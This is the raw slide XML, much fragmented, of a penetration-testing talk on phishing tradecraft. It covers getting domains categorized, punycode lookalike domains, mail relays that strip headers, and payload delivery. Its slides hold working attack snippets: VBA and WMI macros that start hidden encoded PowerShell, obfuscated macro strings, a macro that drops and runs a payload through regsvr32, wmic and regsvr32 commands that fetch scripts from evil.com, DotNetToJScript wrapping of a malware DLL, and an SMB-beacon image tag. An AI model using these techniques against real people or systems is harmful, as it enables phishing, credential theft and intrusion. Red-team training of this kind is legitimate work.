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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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19"/>
    <p:restoredTop sz="94679"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59" d="100"/>
        </p:scale>
        <p:origin x="9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37208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459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526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491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691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7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01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62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10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15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79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60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739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188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88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91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13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541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07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156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090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323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169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707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573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42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501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00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79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790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8452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433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603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57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5093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917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364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2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9169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438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995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2520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3195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403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46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8642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573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4920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002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364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4953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466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4619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616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675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9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1019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578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8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16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26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63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alosintelligence.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csi.websense.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://global.sitesafety.trendmicr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rlfiltering.paloaltonetworks.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.checkpoint.com/urlcat/main.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sitereview.bluecoat.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exchange.xforce.ibmcloud.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://trustedsource.org/en/feedback/url?action=checksingle" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fortiguard.com/webfilt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0pe-sled/Postfix-Server-Setu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jor.io/2013/04/14/remove-sensitive-information-from-email-headers-with-postfix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xtoolbox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ail-teste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pireProject/Empir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zerosum0x0/koadic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screenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite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ranid/DotNetToJScrip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Empire/PowerTools/tree/master/PowerPick/SharpPick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hyperlink" Target="https://bneg.io/2017/07/26/empire-without-powershell-exe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tic-Malware/Ebowla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st.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Arvanaghi/CheckPlease" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/leoloobeek/GoGreen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BGosu7Rgr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fkaesqu3/presentation-materi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of Phishing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Bait, New Tackle Box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Categorization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resolution of domains lacking a category, or in association with a disallowed category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preparation, can easily be obtained prior to assessment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Claimed to be a manual process, likely not the case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 solution for a company can often easily be determined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442875" y="4620100"/>
            <a:ext cx="44388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your categorization here!</a:t>
            </a:r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ForcePoint WebSense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http://csi.websense.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>McAfee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https://trustedsource.org/en/feedback/url?action=checksingle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Symantec BlueCoat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http://sitereview.bluecoat.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Palo Alto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https://urlfiltering.paloaltonetworks.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TrendMicro -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https://global.sitesafety.trendmicro.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cisco Talos -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https://talosintelligence.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fortinet FortiGuard - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://fortiguard.com/webfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IBM X-Force - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://exchange.xforce.ibmcloud.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CheckPoint - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://www.checkpoint.com/urlcat/main.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (requires free account)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...or get it categorized yourself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Clone a site</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>wget --recursive --no-clobber --page-requisites --html-extension --convert-links 	--restrict-file-names=windows --domains example.com --no-parent example.com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site from template, fill with content from category you want (finance, healthcare, etc)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Submit for categorization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 it age like fine wine!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expireddomains.net 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400" y="1442300"/>
            <a:ext cx="6074920" cy="342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expireddomains.net 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Search for domains that have recently expired, as they have a good chance of already being categorized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25" y="2739749"/>
            <a:ext cx="7893051" cy="18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expireddomains.net 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663" y="1489825"/>
            <a:ext cx="6096674" cy="32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expireddomains.net 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ascending by SimilarWeb ranking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0" y="2070923"/>
            <a:ext cx="7832216" cy="25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Categorized as Business/ Economy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975" y="1489825"/>
            <a:ext cx="4365050" cy="34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00" y="1489825"/>
            <a:ext cx="4365051" cy="34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687" y="331750"/>
            <a:ext cx="5480626" cy="44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Tricking the user </a:t>
            </a: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4974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urlcrazy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177" y="1234600"/>
            <a:ext cx="2185350" cy="35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949175" y="1234600"/>
            <a:ext cx="4524300" cy="29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admin@mail-atlantaga.gov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admin@mail.atlantaga.gov.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a2tdsfy32d.tl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admin@mail.atlantaga.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gov-mailing.com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whoami.jpg.exe      Nick “memelord” Powers</a:t>
            </a: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Graduated from University of Tennessee, Chattanooga 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Previously focused on SOC and Compliance engagements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a penetration tester at Rapid7 in Austin, TX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Enjoys breaking things</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lv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Punycoded Internationalized Domain Names (IDNs) </a:t>
            </a:r>
            <a:endParaRPr sz="2400"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332950" y="1427999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it?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Domain containing “internationalized” non-ascii characters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is it a thing?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Representation of IDN with limited ASCII character subset</a:t>
            </a:r>
            <a:endParaRPr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www.bankofamer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>ca.com == www.xn--bankofamerca-b5b.com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www.bankofamer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>ca.com</a:t>
            </a:r>
            <a:endParaRPr sz="160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5237"/>
            <a:ext cx="9144000" cy="16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Punycoding and Why It’s Relevant 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60425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Registrars and browsers check for potential malicious intent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https://www.chromium.org/developers/design-documents/idn-in-google-chrome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https://wiki.mozilla.org/IDN_Display_Algorithm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“Unravelling” occurs for certain character combinations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Unravelling varies between different mail clients and browsers</a:t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650" y="2948275"/>
            <a:ext cx="5067975" cy="2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the mail server</a:t>
            </a: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450" y="1218150"/>
            <a:ext cx="5445075" cy="31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744850" y="4559700"/>
            <a:ext cx="6693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https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki/blob/master/README.md#using-redirectors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requirements</a:t>
            </a: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Encrypted traffic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 from prying eyes (strict iptables rules)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SPF compliant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DKIM signed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Conforming to DMARC standard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Reverse DNS for mail domain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Mail domain WHOIS data anonymized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Mailing domain name in good standing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Mailing IP address in good standing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phishing server</a:t>
            </a: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Popular phishing frameworks (GoPhish, Phishing Frenzy, KingPhisher, SET)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not be visible to network defenders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Mail will be redirected to several other relays to mask the origin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Relays are easy to spin up, spin down, replace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run Dovecot and Postfix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https://github.com/n0pe-sled/Postfix-Server-Setup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Gophish, RoundCube, iRedAdmin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Intermediary SMTP redirector</a:t>
            </a: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Backend phishing server will relay through this host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Strip mail headers that indicate mail origin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https://major.io/2013/04/14/remove-sensitive-information-from-email-headers-with-postfix/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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X-Originating-IP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X-Mailer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Mime-Version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PTR, MX, A records for domain should point here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Hides the true location of the backend server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spin down, spin up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party relay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SendGrid/Mailgun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SPF records should be set to the providers’ mailservers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DMARC records are handled by the provider; no need to set any!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mail server’s legitimacy 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https://mxtoolbox.com/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https://www.mail-tester.com/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Test message delivery to a non-existent address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the payload</a:t>
            </a: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Stealing login credentials through fake login pages is cool, but wide implementations of 2FA mean it’s getting harder and harder to access internal networks with only a set of credentials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625" y="2618719"/>
            <a:ext cx="3048874" cy="20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</a:t>
            </a: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Office Documents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VBA Macros (Visual Basic for Application)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DDE (Dynamic Data Exchange)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SMB beaconing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Click-Once Applications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David_Tulis.doc.exe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Penetration Tester at Protiviti</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Philadelphia</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>University of Tennessee, Chattanooga - 2015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426" y="3132001"/>
            <a:ext cx="833325" cy="8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462850" y="3965325"/>
            <a:ext cx="2032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github.com/kafkaesqu3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600" y="3155873"/>
            <a:ext cx="900675" cy="7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2726888" y="3965325"/>
            <a:ext cx="20781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twitter.com/kafkaesqu3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5033475" y="3965325"/>
            <a:ext cx="1203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/in/davidjtulis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082" y="3288275"/>
            <a:ext cx="515493" cy="5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6696500" y="3965325"/>
            <a:ext cx="17484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godlikesecurity.com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6425" y="3234400"/>
            <a:ext cx="628546" cy="6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execute</a:t>
            </a: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Meterpreter (classic)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PowerShell Empire (PowerShell RAT)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https://github.com/EmpireProject/Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Koadic C3 (JScript RAT)-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https://github.com/zerosum0x0/koadic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Cobalt Strike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DEFAULT CONFIGURATION=BAD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Pre-phish</a:t>
            </a:r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Installed AV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Installed software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AD domain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username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exfiltration (uncategorized domains, DNS, ICMP, etc)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Installed versions of PowerShell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https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/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execute - Wscript.Shell</a:t>
            </a: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objShell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268BD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CreateObject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Wscript.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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objshell.run(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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powershell -nop -ep bypass -enc Z2V0IGEgb....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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586E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E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738A05"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="04202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WMI Win32_ProcessStartup and Win32_Process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Dim payload = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg..."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strComputer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objWMIService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268BD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GetObject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winmgmts:\\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strComputer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\root\cimv2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objStartup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objWMIService.</a:t>
            </a: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Win32_ProcessStartup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objConfig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objStartup.SpawnInstance_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objConfig.ShowWindow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HIDDEN_WINDOW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objProcess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268BD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GetObject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winmgmts:\\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strComputer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\root\cimv2:Win32_Process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objProcess.Create payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="B58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Null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, objConfig, intProcessID</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="586E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E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839496"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="04202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DADADA"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="211E1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F8F8F8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WMI Win32_ProcessStartup and Win32_Process</a:t>
            </a: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Dim payload = "powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVg..."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strComputer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objWMIService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268BD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GetObject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FF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winmgmts:\\"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strComputer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FF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\root\cimv2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objStartup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objWMIService.</a:t>
            </a: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FF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Win32_ProcessStartup"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objConfig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objStartup.SpawnInstance_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objConfig.ShowWindow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HIDDEN_WINDOW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 b="1">
                <a:solidFill>
                  <a:srgbClr val="07364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objProcess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268BD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GetObject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FF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winmgmts:\\"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strComputer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FF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\root\cimv2:Win32_Process"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objProcess.Create payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="B58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Null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, objConfig, intProcessID</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="586E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E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839496"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="04202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DADADA"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="211E1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F8F8F8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WMI Win32_ProcessStartup and Win32_Process</a:t>
            </a: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DADADA"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="211E1E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DADADA"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="211E1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F8F8F8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387900" y="1144125"/>
            <a:ext cx="63171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A1A1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E3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A1A1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>' winmgmts:\\\root\cimv2Win32_ProcessStartup\root\cimv2:Win32_Process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/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var1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ActiveDocument.BuiltInDocumentProperties.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Item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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="269186"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>"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var2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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Left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(var1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>11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var4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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Mid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(var1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>12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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>11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var5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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Mid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(var1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>23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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>20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var6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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Right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(var1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>25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</a:rPr>
              <a:t>Const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HIDDEN_WINDOW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D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>0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/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strComputer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C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="269186"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>"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/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</a:rPr>
              <a:t>Set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objWMIService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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>GetObject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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>var2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&amp;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strComputer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&amp;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FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>var4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</a:rPr>
              <a:t>Set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objStartup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objWMIService.</a:t>
            </a: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</a:rPr>
              <a:t>Get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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>var5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</a:rPr>
              <a:t>Set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objConfig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objStartup.SpawnInstance_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objConfig.ShowWindow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HIDDEN_WINDOW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</a:rPr>
              <a:t>Set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objProcess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268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>GetObject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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>var2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&amp;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strComputer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&amp;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FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>var6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objProcess.Create payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Null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, objConfig, intProcessID</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="586E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E3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6E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="042029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86E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="042029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without powershell.exe</a:t>
            </a:r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br>
              <a:rPr lang="en"/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msbuild.exe Msbuild.csproj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mshta.exe evilfile.hta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regsvr32.exe /s /u /i:file.sct scrobj.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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Living of the land binaries - https://github.com/api0cradle/LOLBAS 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without powershell.exe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MEMORY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wmic process get brief /format:"https://evil.com/s9gsG.xsl"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regsvr32 /s /n /u /i:http://evil.com/t.sct scrobj.dll  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DotNetToJScript</a:t>
            </a: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JScript code to bootstrap an arbitrary .NET assembly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PowerShell, Wscript.shell, or WMI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Arbitrary target binary, arbitrary shellcode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https://github.com/tyranid/DotNetToJScript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DotNetToJScript</a:t>
            </a:r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DotNetToJScript.exe -l vbscript malware.dll &gt; out.vbs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300" y="1961100"/>
            <a:ext cx="6000877" cy="286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talk is geared towards penetration testers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 and considerations to increase success with phishing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Steps to consider during campaign preparation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my mail server be trusted?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my domain be blocked?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be payload be filtered by mail AV?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the payload be caught by endpoint AV?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Powershell payload</a:t>
            </a:r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3117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400" y="1152600"/>
            <a:ext cx="4965699" cy="375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788950" y="4334075"/>
            <a:ext cx="69366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Powershell payload</a:t>
            </a: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3117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https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/SharpPick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https://bneg.io/2017/07/26/empire-without-powershell-exe/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36" name="Shape 336"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788950" y="4334075"/>
            <a:ext cx="69366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1580826"/>
            <a:ext cx="8368200" cy="900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DotNetToJScript</a:t>
            </a:r>
            <a:endParaRPr/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Windows Scripting Object (SCT) for execution by regsrv32.exe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DotNetToJScript.exe -u -l vbscript malware.dll &gt; out.sct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DotNetToJScript</a:t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00" y="1586137"/>
            <a:ext cx="5032800" cy="28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DotNetToJScript</a:t>
            </a:r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50475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3A1A1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' fetch the payload from shape1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ActiveDocument.Shapes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="D3368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).TextFrame.TextRange.Text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93A1A1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' "WScript.Shell" from shape2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ActiveDocument.Shapes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="D3368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).TextFrame.TextRange.Text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93A1A1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' regsvr32.exe /s /u /i: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ActiveDocument.Shapes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="D3368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).TextFrame.TextRange.Text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93A1A1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' " scrobj.dll"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q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ActiveDocument.Shapes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="D33682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).TextFrame.TextRange.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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93A1A1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' write the payload to disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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11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Environ$(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TEMP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1400">
                <a:solidFill>
                  <a:srgbClr val="8599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" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="586E75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400">
                <a:solidFill>
                  <a:srgbClr val="269186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\tmp45.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3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endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="586E75"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FDF6E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6" name="Shape 356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5485725" y="1519900"/>
            <a:ext cx="2979300" cy="26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</a:rPr>
              <a:t>Call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SaveContent(m, p)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If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Dir(p)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&lt;&gt;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C60000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>""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Then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/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   </a:t>
            </a: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</a:rPr>
              <a:t>Dim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tmp As Object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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="073642"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Set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Z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=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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>CreateObject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(n)</a:t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   Z.Run (o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&amp;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p </a:t>
            </a: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&amp;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 q), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="D33682"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>0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>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a: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  <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="586E75"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FDF6E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>End If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 obfuscation</a:t>
            </a:r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https://github.com/sevagas/macro_pack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950" y="1443950"/>
            <a:ext cx="3980951" cy="31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payload protections</a:t>
            </a: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Payload keying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https://github.com/Genetic-Malware/Ebowla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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https://github.com/leoloobeek/GoGreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Sandbox checks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https://github.com/Arvanaghi/CheckPlease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Attaching document vs link to download document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Restrict document downloads based on IP address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Apache mod_rewrite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https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10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87900" y="4305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SMB can egress from the network	</a:t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250" y="1318550"/>
            <a:ext cx="4896722" cy="367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87900" y="4305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87900" y="4305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SMB Egress Testing		</a:t>
            </a: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161325" y="1318549"/>
            <a:ext cx="83682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Embedded image tag within email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Landing page of campaign containing image tag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&lt;img src=”\\12.34.56.78\lol.gif” /&gt;</a:t>
            </a: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38" y="2372125"/>
            <a:ext cx="8662526" cy="277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game has changed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Techniques to increase success with phishing</a:t>
            </a:r>
            <a:endParaRPr sz="140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Layers of defense to block your campaign</a:t>
            </a:r>
            <a:endParaRPr sz="140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“Offense-in-Depth”</a:t>
            </a:r>
            <a:endParaRPr sz="140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854" y="1489825"/>
            <a:ext cx="4268821" cy="36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442875" y="4620100"/>
            <a:ext cx="44388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https://blog.cobaltstrike.com/2012/12/05/offense-in-depth/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387900" y="4305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SMB Egress Testing	(cont.)	</a:t>
            </a:r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161325" y="1318549"/>
            <a:ext cx="83682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 Office documents - Template Injection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PDF Documents - CheckPoint disclosure last week!</a:t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1225"/>
            <a:ext cx="9144001" cy="29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- HTML Application (HTA)</a:t>
